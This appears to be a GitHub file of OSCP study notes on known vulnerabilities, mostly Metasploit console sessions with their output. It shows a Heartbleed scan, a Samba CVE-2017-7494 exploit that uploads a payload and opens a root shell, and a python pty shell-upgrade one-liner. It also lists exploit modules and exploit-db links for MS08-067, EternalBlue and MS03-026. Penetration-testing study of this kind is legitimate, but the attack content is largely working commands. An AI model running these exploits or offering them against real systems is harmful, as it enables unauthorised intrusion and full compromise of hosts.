forked from R0B1NL1N/OSCP-note
-
Notifications
You must be signed in to change notification settings - Fork 0
/
KNOWN-vulnerabilities
100 lines (87 loc) · 4.3 KB
/
KNOWN-vulnerabilities
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
*HEARTBLEED*
-----
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set RHOSTS 10.11.1.22
RHOSTS => 10.11.1.22
msf auxiliary(openssl_heartbleed) > set VERBOSE TRUE
VERBOSE => true
msf auxiliary(openssl_heartbleed) > run
[*] 10.11.1.22:443 - Sending Client Hello...
[*] 10.11.1.22:443 - SSL record #1:
[*] 10.11.1.22:443 - Type: 22
[*] 10.11.1.22:443 - Version: 0x0301
[*] 10.11.1.22:443 - Length: 74
[*] 10.11.1.22:443 - Handshake #1:
[*] 10.11.1.22:443 - Length: 70
[*] 10.11.1.22:443 - Type: Server Hello (2)
[*] 10.11.1.22:443 - Server Hello Version: 0x0301
[*] 10.11.1.22:443 - Server Hello random data: 599700393390a4765f9ae173da3410493841101aaf77ef1f0ca8bdcf90edc960
[*] 10.11.1.22:443 - Server Hello Session ID length: 32
[*] 10.11.1.22:443 - Server Hello Session ID: 008f2016ceec3fba7ddc90a21a27cc6d0d5c4cdcb3671efcea1616fdbc7c3d36
[*] 10.11.1.22:443 - SSL record #2:
[*] 10.11.1.22:443 - Type: 22
[*] 10.11.1.22:443 - Version: 0x0301
[*] 10.11.1.22:443 - Length: 922
[*] 10.11.1.22:443 - Handshake #1:
[*] 10.11.1.22:443 - Length: 918
[*] 10.11.1.22:443 - Type: Certificate Data (11)
[*] 10.11.1.22:443 - Certificates length: 915
[*] 10.11.1.22:443 - Data length: 918
[*] 10.11.1.22:443 - Certificate #1:
[*] 10.11.1.22:443 - Certificate #1: Length: 912
[*] 10.11.1.22:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x83069d38>, issuer=#<OpenSSL::X509::Name:0x83069d60>, serial=#<OpenSSL::BN:0x83069e00>, not_before=2007-01-16 14:44:50 UTC, not_after=2008-01-16 14:44:50 UTC>
[*] 10.11.1.22:443 - SSL record #3:
[*] 10.11.1.22:443 - Type: 22
[*] 10.11.1.22:443 - Version: 0x0301
[*] 10.11.1.22:443 - Length: 397
[*] 10.11.1.22:443 - Handshake #1:
[*] 10.11.1.22:443 - Length: 393
[*] 10.11.1.22:443 - Type: Server Key Exchange (12)
[*] 10.11.1.22:443 - SSL record #4:
[*] 10.11.1.22:443 - Type: 22
[*] 10.11.1.22:443 - Version: 0x0301
[*] 10.11.1.22:443 - Length: 4
[*] 10.11.1.22:443 - Handshake #1:
[*] 10.11.1.22:443 - Length: 0
[*] 10.11.1.22:443 - Type: Server Hello Done (14)
[*] 10.11.1.22:443 - Sending Heartbeat...
[-] 10.11.1.22:443 - No Heartbeat response...
[-] 10.11.1.22:443 - Looks like there isn't leaked information...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(openssl_heartbleed) >
*SAMBA CVE-2017-7494*
-----
msf exploit(is_known_pipename) > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > set RHOST 10.1.1.4
RHOST => 10.1.1.4
msf exploit(is_known_pipename) > exploit
[*] 10.1.1.4:445 - Using location \\10.1.1.4\share\ for the path
[*] 10.1.1.4:445 - Retrieving the remote path of the share 'share'
[*] 10.1.1.4:445 - Share 'share' has server-side path '/tmp/
[*] 10.1.1.4:445 - Uploaded payload to \\10.1.1.4\share\upLdCyBq.so
[*] 10.1.1.4:445 - Loading the payload from server-side path /tmp/upLdCyBq.so using \\PIPE\/tmp/upLdCyBq.so...
[-] 10.1.1.4:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 10.1.1.4:445 - Loading the payload from server-side path /tmp/upLdCyBq.so using /tmp/upLdCyBq.so...
[+] 10.1.1.4:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (10.100.100.5:45983 -> 10.1.1.4:445) at 2017-10-25 22:47:34 +0700
python -c 'import pty;pty.spawn("/bin/bash")'
root@1d71e2ebf7b6:/tmp# exit
*Microsoft RPC - MS08-067. Code execution *
----
https://www.exploit-db.com/exploits/16362/
use exploit/windows/smb/ms08_067_netapi
options
info
Standalone exploit:
https://www.exploit-db.com/exploits/7104/
SMB Eternalblue:
windows/smb/ms17_010_eternalblue
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
MS03-026 Microsoft RPC DCOM Interface Overflow* // *CVE-2003-0352
-----
use exploit/windows/dcerpc/ms03_026_dcom
https://www.exploit-db.com/exploits/16749/
https://www.securityfocus.com/bid/8205/exploit
https://blog.rapid7.com/2012/05/22/10-hottest-metasploit-exploit-and-auxiliary-modules-in-april/